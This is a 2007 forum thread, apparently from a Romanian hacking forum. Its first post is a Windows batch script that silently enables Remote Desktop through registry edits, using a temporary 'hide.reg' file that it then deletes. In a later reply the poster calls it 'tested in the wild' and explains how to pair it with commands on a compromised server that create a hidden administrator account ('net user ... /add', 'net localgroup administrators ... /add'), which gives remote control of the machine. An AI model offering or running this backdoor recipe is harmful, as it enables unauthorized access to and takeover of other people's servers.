escalation666 Posted June 25, 2007 Report Posted June 25, 2007 @echo off@echo ***********************************************************************@echo * *@echo * Enable Remote Desktop From Dos *@echo * *@echo * *@echo * *@echo * *@echo * *@echo * Terminal Server Is Enable Now...... *@echo * *@echo * *@echo * THIS BAT FILE MADE BY: BOGYMAN AND ALL THE RIGHTS RESERVED TO HIM. *@echo * *@echo ***********************************************************************echo Windows Registry Editor Version 5.00> hide.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> hide.regecho "fDenyTSConnections"=dword:00000000>> hide.regREGEDIT /S hide.regDEL /Q hide.regecho Windows Registry Editor Version 5.00> hide.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> hide.regecho "AllowTSConnections"=dword:00000001>> hide.regREGEDIT /S hide.regDEL /Q hide.regecho Windows Registry Editor Version 5.00> hide.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> hide.regecho "fAllowToGetHelp"=dword:00000001>> hide.regREGEDIT /S hide.regDEL /Q hide.reg Quote
Johnny Posted June 25, 2007 Report Posted June 25, 2007 nefolositor , pentru ca iti tre un user si o parola ca sa te poti conecta la remote nu doar sa fie activat. Quote
escalation666 Posted June 25, 2007 Author Report Posted June 25, 2007 Te asigur eu ca este folositor, e testat in the wild ...daca poti executa comenzi pe server, iti trebuie cateva secunde sa tastezi net user user_tau parola /add si net localgroup administrators user_tau /add, executi batch-ul si te-ai ales cu un Remote Desktop. Quote